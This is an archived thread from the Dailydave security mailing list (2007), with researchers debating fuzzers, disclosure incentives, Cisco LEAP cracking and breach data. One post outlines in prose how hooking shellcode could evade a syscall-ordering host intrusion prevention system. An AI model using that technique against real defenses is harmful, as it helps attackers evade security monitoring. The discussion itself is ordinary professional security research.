Date: Wed, 7 Feb 2007 14:38:23 -0800 (PST)
Subject: [Dailydave] Some Sums
In-Reply-To: <597760c90702071245u1b406f08q20f3c70cd08c732@mail.gmail.com>
References: <20070205131130.292040@gmx.net> <028e01c74933$32a6a410$2e08a8c0@CAM.ARTIMI.COM> <20070205152244.239350@gmx.net> <45C78904.5060905@invisiblethings.org> <1df0a410702070554h54aa171bldb9c79b76a5d6353@mail.gmail.com> <597760c90702071245u1b406f08q20f3c70cd08c732@mail.gmail.com>
Message-ID: <20070207143518.V68521@spam.musubi.org>

On Wed, 7 Feb 2007, Dominique Brezinski wrote:
> Tom and Halvar, why not go the extra step and sign the message? If you
> truly want a public record of first reference, it would seem a
> necessary step.

this thread has had me thinking over the last few days of building a distributed system to maintain lists of hashes. signed to prove provenance, distributed (and publicly readable) to keep the information available in many locations a la usenet or mailing lists.
if more people than just myself think this would be useful, we can build it. :)

-- 
christian void
cvoid at morphine.com
http://www.morphine.com/void/

From ari.takanen at codenomicon.com Thu Feb 8 00:18:27 2007
From: ari.takanen at codenomicon.com (Ari Takanen)
Date: Thu, 8 Feb 2007 07:18:27 +0200
Subject: [Dailydave] Some Sums
Message-ID: <20070208051827.GC31087@codenomicon.com>

Hmmm, distantly related to this: Maybe us fuzzer developers should save hashes of some millions of attacks somewhere also, so that we can prove our tools were used to find the flaws in the first place... Looking at past iDefence disclosures for example, I am beginning to doubt that they reward for publishing flaws instead of finding flaws (this is like the patent system in Europe, which rewards first to file, not first to invent)... More and more flaws are found using tools, and pre-packaged attacks. If a flaw is found using a product like Codenomicon/PROTOS or CANVAS, I suppose the reward should also be paid to the tool developer and not the tool user. ;)

Tongue-in-the-cheek-greetings,

/Ari

> Date: Wed, 7 Feb 2007 02:11:16 -0500 (EST)
> From: "Steven M. Christey"
> Subject: Re: [Dailydave] Some Sums
> To: dailydave at lists.immunitysec.com
> Message-ID: <200702070711.l177BGJw026300 at faron.mitre.org>
> 
> > I take it that's going to be the hash of some file or other data
> > you're going to produce for someone at sometime in the future?
> > Couldn't you just have used a ZK protocol and left us all out of
> > it? ;-) If you're going to use our inboxes as substitutes for
> > escrow/notarisation centres, you could perhaps tell us just a
> > little bit more about what you're doing!
> 
> MD5/SHA-1 crackability issues aside*, the next question that
> immediately comes to mind is why there isn't a central place for
> researchers to do exactly this - make a claim about knowledge that's
> provably fixed in a certain place and time.
> Oh, wait, we're all
> individuals and we don't need anybody else. There's no need to
> organize in any way, shape, or form. After all, when Ilfak posted
> that third-party patch, ABSOLUTELY EVERYBODY knew who he was and
> immediately trusted him, so why not Halvar? Sorry, I forgot about the
> outside world for a second.
> 
> Snarkily and respectfully,
> Steve
> 
> * crypto is my kryptonite, I defer to the geniuses.

From Thierry at Zoller.lu Thu Feb 8 07:34:31 2007
From: Thierry at Zoller.lu (Thierry Zoller)
Date: Thu, 8 Feb 2007 13:34:31 +0100
Subject: [Dailydave] SILICA, hashes, etc
In-Reply-To: <45CA00E2.30804@immunityinc.com>
References: <45CA00E2.30804@immunityinc.com>
Message-ID: <1429753244.20070208133431@Zoller.lu>

Dear Dave,

DA> One of our early adopters has a CISCO Leap network and I
DA> remember reading of a simple algorithmic crack for the
DA> authentication....has anyone tested it?

Asleap - Joshua Wright

The funny thing is, although Cisco knows it's broken, they continue to use it in new products.

-- 
http://secdev.zoller.lu
Thierry Zoller
Fingerprint : 5D84 BFDC CD36 A951 2C45 2E57 28B3 75DD 0AC6 F1C7

From dave.aitel at gmail.com Thu Feb 8 08:32:00 2007
From: dave.aitel at gmail.com (Dave Aitel)
Date: Thu, 8 Feb 2007 08:32:00 -0500
Subject: [Dailydave] Some Sums
In-Reply-To: <20070208051827.GC31087@codenomicon.com>
References: <20070208051827.GC31087@codenomicon.com>

s/CANVAS/SPIKE/g

CANVAS is not a fuzzer. SPIKE is a fuzzer. When PROTOS includes shellcode, you can compare PROTOS and CANVAS.

And the thing about fuzzers is that using them is often harder than writing them. For example, a lot of programs will die when fuzzed too quickly. Or they may have one thousand and one ways to trigger a null pointer exception that you have to avoid. Or they may find many different bugs, each of which has to be sorted through for exploitability. Maybe they find 5 different exploitable bugs, but only one of them is reliably exploitable.
In other words, there's a lot of work that goes into turning a fuzzer+vuln proggie into bugs you can sell. And, of course, there's no easy way to tell that one fuzzer is any better than the other. 5000 crashes do not equal 1 good remote. It's not a number game, or even a code coverage game.

For what it's worth, binary analysis, especially automated binary analysis, suffers from many of the same flaws, and of course you can combine the two techniques, and then you get to sort through even more unexploitable integer overflows. But that's ok, because every single bug is beautiful, right? Some of these bug-buying programs are like affirmative action for vulnerabilities.

The original SPIKE release did include a GPG'd advisory, and all it did was make everyone all paranoid. And, of course, I lost the key I used to encrypt it, so now even I wish I knew what the bug was.

-dave

On 2/8/07, Ari Takanen wrote:
> 
> Hmmm, distantly related to this: Maybe us fuzzer developers should
> save hashes of some millions of attacks somewhere also, so that we can
> prove our tools were used to find the flaws in the first
> place... Looking at past iDefence disclosures for example, I am
> beginning to doubt that they reward for publishing flaws instead of
> finding flaws (this is like the patent system in Europe, which rewards
> first to file, not first to invent)... More and more flaws are found
> using tools, and pre-packaged attacks. If a flaw is found using a
> product like Codenomicon/PROTOS or CANVAS, I suppose the reward
> should also be paid to the tool developer and not the tool user. ;)
> 
> Tongue-in-the-cheek-greetings,
> 
> /Ari
> 
> > Date: Wed, 7 Feb 2007 02:11:16 -0500 (EST)
> > From: "Steven M.
Christey"
> > Subject: Re: [Dailydave] Some Sums
> > To: dailydave at lists.immunitysec.com
> > Message-ID: <200702070711.l177BGJw026300 at faron.mitre.org>
> > 
> > > I take it that's going to be the hash of some file or other data
> > > you're going to produce for someone at sometime in the future?
> > > Couldn't you just have used a ZK protocol and left us all out of
> > > it? ;-) If you're going to use our inboxes as substitutes for
> > > escrow/notarisation centres, you could perhaps tell us just a
> > > little bit more about what you're doing!
> > 
> > MD5/SHA-1 crackability issues aside*, the next question that
> > immediately comes to mind is why there isn't a central place for
> > researchers to do exactly this - make a claim about knowledge that's
> > provably fixed in a certain place and time. Oh, wait, we're all
> > individuals and we don't need anybody else. There's no need to
> > organize in any way, shape, or form. After all, when Ilfak posted
> > that third-party patch, ABSOLUTELY EVERYBODY knew who he was and
> > immediately trusted him, so why not Halvar? Sorry, I forgot about the
> > outside world for a second.
> > 
> > Snarkily and respectfully,
> > Steve
> > 
> > * crypto is my kryptonite, I defer to the geniuses.
From phatbuckett at gmail.com Thu Feb 8 09:32:22 2007
From: phatbuckett at gmail.com (Darren Spruell)
Date: Thu, 8 Feb 2007 07:32:22 -0700
Subject: [Dailydave] SILICA, hashes, etc
In-Reply-To: <1429753244.20070208133431@Zoller.lu>
References: <45CA00E2.30804@immunityinc.com> <1429753244.20070208133431@Zoller.lu>
Message-ID: <839aec700702080632l49435eds57d94c8147102988@mail.gmail.com>

On 2/8/07, Thierry Zoller wrote:
> Dear Dave,
> 
> DA> One of our early adopters has a CISCO Leap network and I
> DA> remember reading of a simple algorithmic crack for the
> DA> authentication....has anyone tested it?
> 
> Asleap - Joshua Wright
> The funny thing is, although Cisco knows it's broken they continue to
> use it in new products.

Another funny thing is, if you confront any Cisco engineer about LEAP's insecurities, they claim to be encouraging customers to go to EAP-FAST instead.

http://www.cisco.com/en/US/products/hw/wireless/ps430/products_qanda_item09186a00802030dc.shtml
http://www.ciscopress.com/articles/article.asp?p=369223&seqNum=5&rl=1

Seems the security implementation of EAP-FAST has its own share of imperfections as well, though. I wonder why a more standardized wireless security protocol didn't appeal to Cisco instead?

DS

From olef.anderson at gmail.com Thu Feb 8 12:48:36 2007
From: olef.anderson at gmail.com (Olef Anderson)
Date: Thu, 8 Feb 2007 09:48:36 -0800
Subject: [Dailydave] Some Sums
In-Reply-To: <20070208051827.GC31087@codenomicon.com>
References: <20070208051827.GC31087@codenomicon.com>
Message-ID: <9b4f936f0702080948t5e4231ja4eab38d2523b8aa@mail.gmail.com>

About this whole fuzzer business, how about putting some cold hard cash where the corporate mouthpiece is at? Since obviously you happen to have some VC money (a booth on the RSA floor is a sign), you can back your claims with real currency. I would love to give you the opportunity.
Let's take the latest Microsoft Exchange release (2007) and 2 weeks of your time running your PROTOS fuzzer. At the end of the 2 weeks, if you can find the existing remote root hole in it, I am offering to pay you the bug's worth of $150 000.00. However, if you are not successful, I should be paid the very same amount, in return for which I shall present you the exploit. From that point you will be free to coordinate vendors, release advisories, whatever it takes. Just to clarify a point though, no DoSes are acceptable; it should be an overflow that leads to clear code execution (the mailing list subscribers could be the judge of that).

Wouldn't that be nice, to prove that you actually know what you are talking about?

On 2/7/07, Ari Takanen wrote:
> 
> Hmmm, distantly related to this: Maybe us fuzzer developers should
> save hashes of some millions of attacks somewhere also, so that we can
> prove our tools were used to find the flaws in the first
> place... Looking at past iDefence disclosures for example, I am
> beginning to doubt that they reward for publishing flaws instead of
> finding flaws (this is like the patent system in Europe, which rewards
> first to file, not first to invent)... More and more flaws are found
> using tools, and pre-packaged attacks. If a flaw is found using a
> product like Codenomicon/PROTOS or CANVAS, I suppose the reward
> should also be paid to the tool developer and not the tool user. ;)
> 
> Tongue-in-the-cheek-greetings,
> 
> /Ari
> 
> > Date: Wed, 7 Feb 2007 02:11:16 -0500 (EST)
> > From: "Steven M. Christey"
> > Subject: Re: [Dailydave] Some Sums
> > To: dailydave at lists.immunitysec.com
> > Message-ID: <200702070711.l177BGJw026300 at faron.mitre.org>
> > 
> > > I take it that's going to be the hash of some file or other data
> > > you're going to produce for someone at sometime in the future?
> > > Couldn't you just have used a ZK protocol and left us all out of
> > > it?
> > > ;-) If you're going to use our inboxes as substitutes for
> > > escrow/notarisation centres, you could perhaps tell us just a
> > > little bit more about what you're doing!
> > 
> > MD5/SHA-1 crackability issues aside*, the next question that
> > immediately comes to mind is why there isn't a central place for
> > researchers to do exactly this - make a claim about knowledge that's
> > provably fixed in a certain place and time. Oh, wait, we're all
> > individuals and we don't need anybody else. There's no need to
> > organize in any way, shape, or form. After all, when Ilfak posted
> > that third-party patch, ABSOLUTELY EVERYBODY knew who he was and
> > immediately trusted him, so why not Halvar? Sorry, I forgot about the
> > outside world for a second.
> > 
> > Snarkily and respectfully,
> > Steve
> > 
> > * crypto is my kryptonite, I defer to the geniuses.

From pmelson at gmail.com Thu Feb 8 17:05:59 2007
From: pmelson at gmail.com (Paul Melson)
Date: Thu, 8 Feb 2007 17:05:59 -0500
Subject: [Dailydave] SILICA, hashes, etc
In-Reply-To: <45CA00E2.30804@immunityinc.com>
References: <45CA00E2.30804@immunityinc.com>
Message-ID: <006001c74bcd$510b6a70$3400300a@ad.priorityhealth.com>

> One of our early adopters has a CISCO Leap network and I remember reading of a simple algorithmic crack
> for the authentication....has anyone tested it?

LEAP uses MS-CHAPv1 (PPTP circa NT4), which sends the LANMan v1 hash otherwise in the clear. LEAP doesn't actually introduce any new security problems, it just reuses old ones.

The debate over what to use for wireless security should be old by now.
XP-SP1 and Cisco firmware updates should eliminate the need for substandard third-party supplicants that use substandard third-party crypto. But if there's one thing Cisco's not good at, it's walking away from its own ideas.

PaulM

From adam at homeport.org Thu Feb 8 14:37:14 2007
From: adam at homeport.org (Adam Shostack)
Date: Thu, 8 Feb 2007 14:37:14 -0500
Subject: [Dailydave] Graphing: Don't believe everything you see.
References: <20070207025853.GA21338@codeblau.de> <20070207073538.946E71BF9DA@absinthe.tinho.net> <20070207183926.GA31790@homeport.org>
Message-ID: <20070208193714.GA12590@homeport.org>

Avery,

I'll know it when I see it. :)

I was really excited to see "Is There a Cost to Privacy Breaches? An Event Study," Alessandro Acquisti, Allan Friedman, and Rahul Telang. WEIS 2006 and ICIS 2006. (http://www.heinz.cmu.edu/~acquisti/papers/acquisti-friedman-telang-privacy-breaches.pdf) This study debunked the idea that breach notices hurt the company's shareholders in the long run. It's an important misconception, and I'm glad to have data to show that it's wrong.

Similarly, I was pleased to see my co-blogger Chris Walsh refute a claim about 'the industry's dumbest practice' by looking at data. (http://www.emergentchaos.com/archives/2006/12/lets_look_at_some_data.html)

So I don't know what I want to see in detail. But what I want to see, in a broad sense, is that we get over our shame over having made mistakes, and start discussing what really goes wrong. I want to see us discussing it in a data driven fashion. Data is not the plural of anecdote. Data comes from having a consistent sampling method. "Compelled by law to disclose, and unable to find a loophole" is admittedly not the best sampling method, but it's better than anecdote, and it's better than voluntary anonymous survey.

I hope that by understanding that the sky isn't falling, we can evolve better sampling and disclosure, and start to make real progress by studying problems.
I'll get off my soapbox before Dave kills me now.

Adam

On Wed, Feb 07, 2007 at 09:15:14PM -0500, Avery Sawaba wrote:
| I'm actually doing some analysis on this data right now (I'm
| sawaba at attrition.org). Is there anything in particular you'd like to see?
| Perhaps I already have some of what you're looking for, but I haven't posted
| any of my metrics. I can drop a note to the list if/when something is posted.
| 
| --Sawaba
| 
| On 2/7/07, Adam Shostack wrote:
| 
|     Speaking for myself, I think there are much more interesting questions
|     than looking at correlations between defects and complexity. For
|     example, we could look at correlations between failures in the real
|     world and training/education.
| 
|     The breach notices that Attrition is accumulating
|     (http://attrition.org/dataloss) give us a set of real world failure
|     data. That's something we've never really had. Now we can start
|     mining it and learning things. For example, does the number of CISSPs
|     employed by an organization correlate with the reports of failures
|     compared to other similar orgs? Is that correlation positive or
|     negative? Does "user education" have an effect?
| 
|     There's a huge amount of data in the attrition data set, and it all
|     involves real pain that real organizations are feeling as they try to
|     secure their data. It's worth studying.
| 
|     Adam
| 
|     On Wed, Feb 07, 2007 at 02:35:38AM -0500, dan at geer.org wrote:
|     | 
|     | If anyone wants to argue about whether complexity
|     | and security are negatively correlated, then let's
|     | get to it.
|     | 
|     | --dan, resisting burning bandwidth unasked
|     | 

From asotirov at determina.com Thu Feb 8 20:49:30 2007
From: asotirov at determina.com (Alexander Sotirov)
Date: Thu, 08 Feb 2007 17:49:30 -0800
Subject: [Dailydave] Graphing: Don't believe everything you see.
In-Reply-To: <45C923E3.4070509@immunityinc.com>
References: <45C923E3.4070509@immunityinc.com>
Message-ID: <45CBD32A.7080504@determina.com>

Dave Aitel wrote:
> For the record, or at least, as a reminder to the record, anything
> based solely on system call ordering is going to have a bugger of a
> time dealing with CreateThread().

What is the problem with CreateThread? You just need to look at the syscall ordering per thread, not per process, and everything will be fine.

Alex

From dfc at anize.org Fri Feb 9 12:57:06 2007
From: dfc at anize.org (Douglas F. Calvert)
Date: Fri, 09 Feb 2007 12:57:06 -0500
Subject: [Dailydave] Graphing: Don't believe everything you see.
In-Reply-To: <20070208193714.GA12590@homeport.org>
References: <20070207025853.GA21338@codeblau.de> <20070207073538.946E71BF9DA@absinthe.tinho.net> <20070207183926.GA31790@homeport.org> <20070208193714.GA12590@homeport.org>
Message-ID: <45CCB5F2.60106@anize.org>

Adam Shostack wrote:
> Avery,
> 
> I'll know it when I see it. :)
> 
> I was really excited to see "Is There a Cost to Privacy Breaches? An
> Event Study," Alessandro Acquisti, Allan Friedman, and Rahul
> Telang. WEIS 2006 and ICIS 2006.
> (http://www.heinz.cmu.edu/~acquisti/papers/acquisti-friedman-telang-privacy-breaches.pdf)
> This study debunked the idea that breach notices hurt the company's
> shareholders in the long run.
> It's an important misconception, and
> I'm glad to have data to show that it's wrong.
> 

Why wouldn't you want the market to punish actors with security lapses? Economic incentives are the only way security will be taken seriously.

In related news:

"Mutually Assured Protection: Toward Development of Relational Internet Data Security and Privacy Contracting Norms"
SECURING PRIVACY IN THE INTERNET AGE, Radin et al., eds., Stanford University Press, 2006

Contact: ANDREA M. MATWYSHYN
University of Florida, University of Cambridge
Email: andreamm at ufl.edu
Auth-Page: http://ssrn.com/author=627948
Full Text: http://ssrn.com/abstract=914420

ABSTRACT: This paper empirically and normatively explores the current data security contracting regime that exists online. Using an analytical lens from complexity theory, this article presents an empirical study of 75 websites of publicly traded companies across time, tracking legal emergence of data security contracting practices. It then argues that a new legal construction for data security contracting is needed to replace the current regime of terms of use and privacy policies; current internet data security contracting structures do not facilitate building of commercial trust.

-- 
Douglas F. Calvert -/- dfc at anize.org
0xC9541FB2 / 0817 30D4 82B6 BB8D 5E66 06F6 B796 073D C954 1FB2

From dave.aitel at gmail.com Fri Feb 9 16:17:23 2007
From: dave.aitel at gmail.com (Dave Aitel)
Date: Fri, 9 Feb 2007 16:17:23 -0500
Subject: [Dailydave] Graphing: Don't believe everything you see.
In-Reply-To: <45CBD32A.7080504@determina.com>
References: <45C923E3.4070509@immunityinc.com> <45CBD32A.7080504@determina.com>

In the famous Buffy episode "Hush", Joss Whedon demonstrates through a creative plot device - removing the voices from the entire town - that often talking is the opposite of communication. But I don't have time to draw pretty pictures, so here goes.

Imagine a simple host intrusion protection device that makes a graph of system call chains of a process as it runs normally, and then in the future restricts the process to those system call chains. These chains start with a CreateThread() and can end at any point, but typically with an ExitThread().

Given this simple system, we can defeat it with a "hooker shellcode" which hooks the functions our shellcode wants to call. For example, "accept()", "recv()", "CreateFile", "Write()" and so on. Because system call arguments are not looked at, we replace the original arguments with the arguments we would prefer, and then let the process continue. Each system call may happen in a completely different thread, but it will happen exactly as the HIPS thinks it should, just with different arguments.

Essentially the problem is that the HIPS models on a per-thread basis, and there is no per-thread memory isolation. Of course to do the hooks themselves you'll want to call VirtualProtect, but we can do something more invasive to take over every thread's exception handler and play our little reindeer games. We can, after all, write into every thread's stack.

And of course, it may be that statistically, CreateThread() branches quite predictably. So if we can call CreateThread, we might be able to do anything we want after that point. CreateThread(DoAcceptData()); CreateThread(DoWriteDataToFile()); CreateThread(DoExecFile()); and so on.

Today I played a lot more with Vista. It turns out it DOES have the 10-half-open TCP connection limit. And there's no way to shut that off.
I take back what I said about it being better than XP SP2.

-dave

On 2/8/07, Alexander Sotirov wrote:
> 
> Dave Aitel wrote:
> > For the record, or at least, as a reminder to the record, anything
> > based solely on system call ordering is going to have a bugger of a
> > time dealing with CreateThread().
> 
> What is the problem with CreateThread? You just need to look at the
> syscall ordering per thread, not per process, and everything will be fine.
> 
> Alex

From ari.takanen at codenomicon.com Sat Feb 10 15:41:44 2007
From: ari.takanen at codenomicon.com (Ari Takanen)
Date: Sat, 10 Feb 2007 22:41:44 +0200
Subject: [Dailydave] Some Sums
Message-ID: <20070210204144.GA20960@codenomicon.com>

Hello Olef,

Sorry, did not notice this comment earlier. Sounds like an interesting challenge, but there are a few problems with the setup. Firstly, our tool does not run for 2 weeks (it takes less than a few hours to test the MS Exchange). This is because we do not do random (or any form of non-deterministic) testing. Secondly, we are a fully no-disclosure company, and refuse to disclose flaws in commercial software (and our customers appreciate this). We are not in the blackmailing business... Open source would be a free target though (my personal opinion, not our company opinion). Thirdly, we do not build exploits, like Dave already pointed out earlier, again for ethical reasons (and because nobody has ever asked us to develop exploits for the found flaws even if building the exploit would be easy).
And a last note: we would have no use nor interest for your exploit, nor would we want to even see it due to the related liability issues.

So I am sorry I have to decline the offer. You are free to continue hunting for your fame and glory from the remote exploits. I wish you good luck in the hunt! And I will shut up about our products as I definitely do not even want you to get these tools in your hand. ;)

I hope you had a chance to visit us at RSA! We are constantly looking for skilled people who wish to start doing more proactive work in security.

/Ari

PS: Yes, we have some VC funding (from early 2005), but most of our money comes from customers, not from VCs. And we do not throw our money away like some other VC funded companies might appear to be doing. We have existed since 2001, and released our first commercial fuzzing tools in 2002.

On Thu, Feb 08, 2007 at 01:22:02PM -0500, dailydave-request at lists.immunitysec.com wrote:
> Date: Thu, 8 Feb 2007 09:48:36 -0800
> From: "Olef Anderson"
> Subject: Re: [Dailydave] Some Sums
> To: dailydave at lists.immunitysec.com
> 
> About this whole fuzzer business, how about putting some cold hard cash
> where the corporate mouthpiece is at?
> Since obviously you happen to have some VC money, a booth at the RSA floor
> is a sign, you can back your claims with real currency. I would love to give
> you the opportunity.
> 
> Let's take the latest Microsoft Exchange release (2007) and 2 weeks of your
> time running your PROTOS fuzzer. At the end of the 2 weeks, if you can find
> the existing remote root hole in it, I am offering to pay you the bug's worth
> of $150 000.00. However, if you are not successful, I should be paid the
> very same amount, in return for which I shall present you the exploit. From that
> point you will be free to coordinate vendors, release advisories, whatever it
> takes.
> Just to clarify a point though, no DoSes are acceptable, should be an overflow that leads to clear code execution (the mailing list subscribers could be the judge of that).
>
> Wouldn't that be nice to prove that you actually know what you are talking about?
>
> On 2/7/07, Ari Takanen wrote:
> >
> > Hmmm, distantly related to this: Maybe us fuzzer developers should save hashes of some millions of attacks somewhere also, so that we can prove our tools were used to find the flaws in the first place... Looking at past iDefence disclosures for example, I am beginning to doubt that they reward for publishing flaws instead of finding flaws (this is like patent system in Europe which rewards first to file, not first to invent)... More and more flaws are found using tools, and pre-packaged attacks. If a flaw is found using a product like Codenomicon/PROTOS or CANVAS, I suppose the reward should also be paid to the tool developer and not the tool user. ;)
> >
> > Tongue-in-the-cheek-greetings,
> >
> > /Ari

--
-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-
Ari Takanen                      Codenomicon Ltd.
ari.takanen at codenomicon.com     Tutkijantie 4E
tel: +358-40 50 67678            FIN-90570 Oulu
http://www.codenomicon.com       Finland
PGP: http://www.codenomicon.com/codenomicon-key.asc
-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-

From tqbf at matasano.com Sun Feb 11 13:06:16 2007
From: tqbf at matasano.com (Thomas Ptacek)
Date: Sun, 11 Feb 2007 12:06:16 -0600
Subject: [Dailydave] Some Sums
In-Reply-To: <20070210204144.GA20960@codenomicon.com>
References: <20070210204144.GA20960@codenomicon.com>
Message-ID: <1df0a410702111006j149cc5c5w18d8d00f6ce1204a@mail.gmail.com>

The fuzzing vs. inspecting argument is fun and I'm happy to read it from the sidelines, but can I suggest:

1. It's not insightful to point out that fuzzers don't find everything; the point is, they find a lot.

2.
A lot of people are "finding" things simply by being the first to aim someone else's fuzzer at them. I'm not sure what this implies, but it implies something.

3. Ari Takanen, and in particular the OUSPG project at OULU.FI, clearly has some software testing bona fides; PROTOS may be the first comprehensive rule-based format-aware fuzzer for ASN.1 protocols. The SNMP report from '02 was a Big Deal.

4. Ari, if you get on DailyDave and make fun of people for competitive vuln research, you deserve all the crap you get. Troll. =)

On 2/10/07, Ari Takanen wrote:
> Hello Olef,
>
> Sorry did not notice this comment earlier. Sounds like an interesting challenge, but there are a few problems with the setup. Firstly, our tool does not run for 2 weeks (it takes less than a few hours to test the MS Exchange). This is because we do not do random (or any form of non-deterministic) testing. Secondly, we are a fully no-disclosure company, and refuse to disclose flaws in commercial software (and our customers appreciate this). We are not in the blackmailing business... Open source would be free target though (my personal opinion, not our company opinion). Thirdly, we do not build exploits like Dave already pointed out earlier, again for ethical reasons (and because nobody has ever asked us to develop exploits for the found flaws even if building the exploit would be easy). And last note, we would have no use nor interest for your exploit, nor would we want to even see it due to the related liability issues.
>
> So I am sorry I have to decline the offer. You are free to continue hunting for your fame and glory from the remote exploits. I wish you good luck in the hunt! And I will shut up about our products as I definitely do not even want you to get these tools in your hand. ;)
>
> I hope you had a chance to visit us at RSA! We are constantly looking for skilled people who wish to start doing more proactive work in security.
>
> /Ari
>
> PS: Yes we have some VC funding (from early 2005), but most of our money comes from customers, not from VCs. And we do not throw our money away like some other VC funded companies might appear to be doing. We have existed since 2001, and released our first commercial fuzzing tools in 2002.
>
> On Thu, Feb 08, 2007 at 01:22:02PM -0500, dailydave-request at lists.immunitysec.com wrote:
> > Date: Thu, 8 Feb 2007 09:48:36 -0800
> > From: "Olef Anderson"
> > Subject: Re: [Dailydave] Some Sums
> > To: dailydave at lists.immunitysec.com
> >
> > About this whole fuzzer business, how about putting some cold hard cash where the corporate mouthpiece is at? Since obviously you happen to have some VC money, a booth at the RSA floor is a sign, you can back your claims with real currency. I would love to give you the opportunity.
> >
> > Let's take the latest Microsoft Exchange release (2007) and 2 weeks of your time running your PROTOS fuzzer. At the end of the 2 weeks if you can find the existing remote root hole in it, I am offering to pay you the bug's worth of $150 000.00. However if you are not successful, I should be paid the very same amount, which in return I shall present you the exploit. From that point you will be free to coordinate vendors, release advisories, whatever it takes. Just to clarify a point though, no DoSes are acceptable, should be an overflow that leads to clear code execution (the mailing list subscribers could be the judge of that).
> >
> > Wouldn't that be nice to prove that you actually know what you are talking about?
> >
> > On 2/7/07, Ari Takanen wrote:
> > >
> > > Hmmm, distantly related to this: Maybe us fuzzer developers should save hashes of some millions of attacks somewhere also, so that we can prove our tools were used to find the flaws in the first place...
> > > Looking at past iDefence disclosures for example, I am beginning to doubt that they reward for publishing flaws instead of finding flaws (this is like patent system in Europe which rewards first to file, not first to invent)... More and more flaws are found using tools, and pre-packaged attacks. If a flaw is found using a product like Codenomicon/PROTOS or CANVAS, I suppose the reward should also be paid to the tool developer and not the tool user. ;)
> > >
> > > Tongue-in-the-cheek-greetings,
> > >
> > > /Ari
>
> --
> -o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-
> Ari Takanen                      Codenomicon Ltd.
> ari.takanen at codenomicon.com     Tutkijantie 4E
> tel: +358-40 50 67678            FIN-90570 Oulu
> http://www.codenomicon.com       Finland
> PGP: http://www.codenomicon.com/codenomicon-key.asc
> -o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-

From rdobbins at cisco.com Sun Feb 11 16:55:22 2007
From: rdobbins at cisco.com (Roland Dobbins)
Date: Sun, 11 Feb 2007 13:55:22 -0800
Subject: [Dailydave] Some Sums
In-Reply-To: <1df0a410702111006j149cc5c5w18d8d00f6ce1204a@mail.gmail.com>
References: <20070210204144.GA20960@codenomicon.com> <1df0a410702111006j149cc5c5w18d8d00f6ce1204a@mail.gmail.com>
Message-ID: <3E3B6D5E-7E6F-4FAE-9439-28DE3BDCE5F5@cisco.com>

On Feb 11, 2007, at 10:06 AM, Thomas Ptacek wrote:
> 2. A lot of people are "finding" things simply by being the first to
> aim someone else's fuzzer at them. I'm not sure what this implies, but
> it implies something.

I think one possible implication is that fuzzing doesn't yet seem to be a routine element of the testing/QA process.

-----------------------------------------------------------------------
Roland Dobbins // 408.527.6376 voice

The telephone demands complete participation.
-- Marshall McLuhan

From coley at mitre.org Mon Feb 12 00:58:46 2007
From: coley at mitre.org (Steven M. Christey)
Date: Mon, 12 Feb 2007 00:58:46 -0500 (EST)
Subject: [Dailydave] Some Sums
Message-ID: <200702120558.l1C5wkkQ007769@faron.mitre.org>

Tom Ptacek said:
> 2. A lot of people are "finding" things simply by being the first to
> aim someone else's fuzzer at them. I'm not sure what this implies, but
> it implies something.

It's a reflection of the disjointed, disorganized, competitive, non-cooperative nature of the vuln research discipline, at least as far as I can tell as an outsider. The fact that some important vulns are found by multiple researchers is also a reflection of this problem, which is at least a problem from the "secure all software for the public good" perspective, maybe not from other perspectives :)

And/or, maybe fewer people are using fuzzers than assumed. I'd be interested in hearing what the fuzzer people think.

One of the ideas I'll probably never get to implement is to do a chart of major technologies, which vuln types have been found in those technologies, and/or which fuzzers have been aimed at them. That chart would probably have tons of holes in the beginning, but it might at least provide one small mechanism for pointing industrious people in different directions. Take VoIP for example: it's kind of a shame that most VoIP vulns are still in the minimal-complexity, pre-auth, core functionality, obvious "Ax999" and "../../" manipulation stages.

Somebody industrious could totally steal this idea (with my blessing) and put a few days of work into it and make something nice out of it, but eh, easier said than done by somebody else.
- Steve

From demottja at msu.edu Mon Feb 12 08:02:32 2007
From: demottja at msu.edu (Jared DeMott)
Date: Mon, 12 Feb 2007 08:02:32 -0500
Subject: [Dailydave] Some Sums
In-Reply-To: <200702120558.l1C5wkkQ007769@faron.mitre.org>
References: <200702120558.l1C5wkkQ007769@faron.mitre.org>
Message-ID: <45D06568.8060902@msu.edu>

Steven M. Christey wrote:
> Tom Ptacek said:
>
> > 2. A lot of people are "finding" things simply by being the first to
> > aim someone else's fuzzer at them. I'm not sure what this implies, but
> > it implies something.
>
> And/or, maybe fewer people are using fuzzers than assumed - I'd be
> interested in hearing what the fuzzer people think.

A few things off the top of my head:

First of all, some fuzzers cost (a lot of) money. So freelance researchers and/or small research companies aren't going to buy them. Same would be true for small software companies. I wonder if a small software company outsources their testing, and the company doing the testing owns expensive fuzzers, would that be a way to drive down total cost of ownership?

Secondly, many researchers like to build and use their own fuzzers because it's assumed that other people are, or will soon, use the for-pay/public fuzzers. If the assumption holds true the shelf life of potentially discovered bugs will decrease. This is bad for many reasons, mostly because if you simply use someone else's fuzzer the bulk of your costs will be time to develop bugs discovered. It's a shame for that work to go down the drain. But if it helps you find stuff quicker without the costs of building your own fuzzer ... I'll let someone else argue both sides. Just bringing up possible considerations. :) And of course this assumption doesn't hold water for software companies, that ought to be doing their own testing.

Lastly, as Dave pointed out a few posts ago, building != buying != using. Correctly using is half (or some arguable portion) the battle.
I can't imagine a day when even the best testing or security research tools are, "click the big green go button for instant perfect results".

From secadmin at netsecdesign.com Mon Feb 12 11:14:57 2007
From: secadmin at netsecdesign.com (Ed Ray)
Date: Mon, 12 Feb 2007 08:14:57 -0800
Subject: [Dailydave] Graphing: Don't believe everything you see.
References: <45C923E3.4070509@immunityinc.com> <45CBD32A.7080504@determina.com>
Message-ID: <61461588C1AD0840A6104C1AF849D8DA073C8E@exchange.mmicmanhomenet.local>

> Today I played a lot more with Vista. It turns out it DOES
> have the 10-half-open TCP connection limit. And there's no
> way to shut that off. I take back what I said about it being
> better than XP SP2.
>
> -dave

Yeah, just noticed this myself. Seems the lvllord patch to up the half-open connections from 10 to 50 does not work on Vista. :(

Edward Ray

From pmelson at gmail.com Mon Feb 12 11:09:33 2007
From: pmelson at gmail.com (Paul Melson)
Date: Mon, 12 Feb 2007 11:09:33 -0500
Subject: [Dailydave] Some Sums
In-Reply-To: <1df0a410702111006j149cc5c5w18d8d00f6ce1204a@mail.gmail.com>
